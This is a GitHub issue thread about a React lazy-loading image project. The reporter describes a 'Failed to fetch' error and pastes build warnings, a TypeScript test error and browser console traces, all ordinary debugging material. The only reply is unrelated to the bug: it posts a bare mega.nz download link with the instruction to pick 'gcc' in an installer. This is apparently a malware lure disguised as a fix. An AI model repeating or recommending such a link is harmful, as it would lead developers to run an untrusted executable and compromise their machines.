### ISSUE TITLE
`TypeError: Failed to fetch` on Development Server Start

### ISSUE THREAD

**Issue by sabeerbikba** [ipenywis/img-lazy-loading#1]
When starting the development server, the following error is shown:

![image](https://github.com/user-attachments/assets/1d5c740c-8690-44ca-8704-7c225fbdd865)

```bash
Compiled with warnings.

Failed to parse source map from '/home/sabeerbikba02/img-lazy-loading/node_modules/.pnpm/react-blurhash@0.1.3_blurhash@1.1.5_react@18.3.1/node_modules/react-blurhash/src/Blurhash.tsx' file: Error: ENOENT: no such file or directory, open '/home/sabeerbikba02/img-lazy-loading/node_modules/.pnpm/react-blurhash@0.1.3_blurhash@1.1.5_react@18.3.1/node_modules/react-blurhash/src/Blurhash.tsx'

Failed to parse source map from '/home/sabeerbikba02/img-lazy-loading/node_modules/.pnpm/react-blurhash@0.1.3_blurhash@1.1.5_react@18.3.1/node_modules/react-blurhash/src/BlurhashCanvas.tsx' file: Error: ENOENT: no such file or directory, open '/home/sabeerbikba02/img-lazy-loading/node_modules/.pnpm/react-blurhash@0.1.3_blurhash@1.1.5_react@18.3.1/node_modules/react-blurhash/src/BlurhashCanvas.tsx'

Failed to parse source map from '/home/sabeerbikba02/img-lazy-loading/node_modules/.pnpm/react-blurhash@0.1.3_blurhash@1.1.5_react@18.3.1/node_modules/react-blurhash/src/index.ts' file: Error: ENOENT: no such file or directory, open '/home/sabeerbikba02/img-lazy-loading/node_modules/.pnpm/react-blurhash@0.1.3_blurhash@1.1.5_react@18.3.1/node_modules/react-blurhash/src/index.ts'

[eslint] 
src/App.tsx
  Line 2:8:   'logo' is defined but never used                @typescript-eslint/no-unused-vars
  Line 4:10:  'BrowserLazyLoading' is defined but never used  @typescript-eslint/no-unused-vars
  Line 6:10:  'ReactLazyLoading' is defined but never used    @typescript-eslint/no-unused-vars

src/components/blurhashLazyLoading.tsx
  Line 1:10:   'importImagesUrls' is defined but never used     @typescript-eslint/no-unused-vars
  Line 2:10:   'LazyLoadImage' is defined but never used        @typescript-eslint/no-unused-vars
  Line 7:10:   'Blurhash' is defined but never used             @typescript-eslint/no-unused-vars
  Line 22:7:   'Image' is assigned a value but never used       @typescript-eslint/no-unused-vars
  Line 27:10:  'isLoading' is assigned a value but never used   @typescript-eslint/no-unused-vars
  Line 27:21:  'setLoading' is assigned a value but never used  @typescript-eslint/no-unused-vars

src/components/optimizedImage.tsx
  Line 4:3:  'LazyLoadComponent' is defined but never used  @typescript-eslint/no-unused-vars

Search for the keywords to learn more about each warning.
To ignore, add // eslint-disable-next-line to the line before.

WARNING in ./node_modules/.pnpm/react-blurhash@0.1.3_blurhash@1.1.5_react@18.3.1/node_modules/react-blurhash/es/Blurhash.js
Module Warning (from ./node_modules/.pnpm/source-map-loader@3.0.2_webpack@5.94.0/node_modules/source-map-loader/dist/cjs.js):
Failed to parse source map from '/home/sabeerbikba02/img-lazy-loading/node_modules/.pnpm/react-blurhash@0.1.3_blurhash@1.1.5_react@18.3.1/node_modules/react-blurhash/src/Blurhash.tsx' file: Error: ENOENT: no such file or directory, open '/home/sabeerbikba02/img-lazy-loading/node_modules/.pnpm/react-blurhash@0.1.3_blurhash@1.1.5_react@18.3.1/node_modules/react-blurhash/src/Blurhash.tsx'

WARNING in ./node_modules/.pnpm/react-blurhash@0.1.3_blurhash@1.1.5_react@18.3.1/node_modules/react-blurhash/es/BlurhashCanvas.js
Module Warning (from ./node_modules/.pnpm/source-map-loader@3.0.2_webpack@5.94.0/node_modules/source-map-loader/dist/cjs.js):
Failed to parse source map from '/home/sabeerbikba02/img-lazy-loading/node_modules/.pnpm/react-blurhash@0.1.3_blurhash@1.1.5_react@18.3.1/node_modules/react-blurhash/src/BlurhashCanvas.tsx' file: Error: ENOENT: no such file or directory, open '/home/sabeerbikba02/img-lazy-loading/node_modules/.pnpm/react-blurhash@0.1.3_blurhash@1.1.5_react@18.3.1/node_modules/react-blurhash/src/BlurhashCanvas.tsx'

WARNING in ./node_modules/.pnpm/react-blurhash@0.1.3_blurhash@1.1.5_react@18.3.1/node_modules/react-blurhash/es/index.js
Module Warning (from ./node_modules/.pnpm/source-map-loader@3.0.2_webpack@5.94.0/node_modules/source-map-loader/dist/cjs.js):
Failed to parse source map from '/home/sabeerbikba02/img-lazy-loading/node_modules/.pnpm/react-blurhash@0.1.3_blurhash@1.1.5_react@18.3.1/node_modules/react-blurhash/src/index.ts' file: Error: ENOENT: no such file or directory, open '/home/sabeerbikba02/img-lazy-loading/node_modules/.pnpm/react-blurhash@0.1.3_blurhash@1.1.5_react@18.3.1/node_modules/react-blurhash/src/index.ts'

WARNING in [eslint] 
src/App.tsx
  Line 2:8:   'logo' is defined but never used                @typescript-eslint/no-unused-vars
  Line 4:10:  'BrowserLazyLoading' is defined but never used  @typescript-eslint/no-unused-vars
  Line 6:10:  'ReactLazyLoading' is defined but never used    @typescript-eslint/no-unused-vars

src/components/blurhashLazyLoading.tsx
  Line 1:10:   'importImagesUrls' is defined but never used     @typescript-eslint/no-unused-vars
  Line 2:10:   'LazyLoadImage' is defined but never used        @typescript-eslint/no-unused-vars
  Line 7:10:   'Blurhash' is defined but never used             @typescript-eslint/no-unused-vars
  Line 22:7:   'Image' is assigned a value but never used       @typescript-eslint/no-unused-vars
  Line 27:10:  'isLoading' is assigned a value but never used   @typescript-eslint/no-unused-vars
  Line 27:21:  'setLoading' is assigned a value but never used  @typescript-eslint/no-unused-vars

src/components/optimizedImage.tsx
  Line 4:3:  'LazyLoadComponent' is defined but never used  @typescript-eslint/no-unused-vars

webpack compiled with 4 warnings
ERROR in src/App.test.tsx:8:23
TS2339: Property 'toBeInTheDocument' does not exist on type 'JestMatchers<HTMLElement>'.
     6 |   render(<App />);
     7 |   const linkElement = screen.getByText(/learn react/i);
  >  8 |   expect(linkElement).toBeInTheDocument();
       |                       ^^^^^^^^^^^^^^^^^
     9 | });
    10 |

```

```console
Failed to load resource: net::ERR_CONNECTION_REFUSEDUnderstand this error
:9000/images:1 
        
        
       Failed to load resource: net::ERR_CONNECTION_REFUSEDUnderstand this error
blurhashLazyLoading.tsx:33 
        
        
       Uncaught (in promise) TypeError: Failed to fetch
    at fetchImages (blurhashLazyLoading.tsx:33:1)
    at blurhashLazyLoading.tsx:40:1
    at commitHookEffectListMount (react-dom.development.js:23189:1)
    at commitPassiveMountOnFiber (react-dom.development.js:24965:1)
    at commitPassiveMountEffects_complete (react-dom.development.js:24930:1)
    at commitPassiveMountEffects_begin (react-dom.development.js:24917:1)
    at commitPassiveMountEffects (react-dom.development.js:24905:1)
    at flushPassiveEffectsImpl (react-dom.development.js:27078:1)
    at flushPassiveEffects (react-dom.development.js:27023:1)
    at react-dom.development.js:26808:1Understand this error
blurhashLazyLoading.tsx:33 
        
        
       Uncaught (in promise) TypeError: Failed to fetch
    at fetchImages (blurhashLazyLoading.tsx:33:1)
    at blurhashLazyLoading.tsx:40:1
    at commitHookEffectListMount (react-dom.development.js:23189:1)
    at invokePassiveEffectMountInDEV (react-dom.development.js:25193:1)
    at invokeEffectsInDev (react-dom.development.js:27390:1)
    at commitDoubleInvokeEffectsInDEV (react-dom.development.js:27369:1)
    at flushPassiveEffectsImpl (react-dom.development.js:27095:1)
    at flushPassiveEffects (react-dom.development.js:27023:1)
    at react-dom.development.js:26808:1
    at workLoop (scheduler.development.js:266:1)Understand this error
```

Steps to Reproduce:

1. Clone the repository freshly using `git clone https://github.com/ipenywis/img-lazy-loading.git`.
2. Install dependencies with npm install or yarn install.
3. Start the development server with npm start or yarn start.
4. Observe the console output for the error.

**Comment by Zoraaa-z** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."
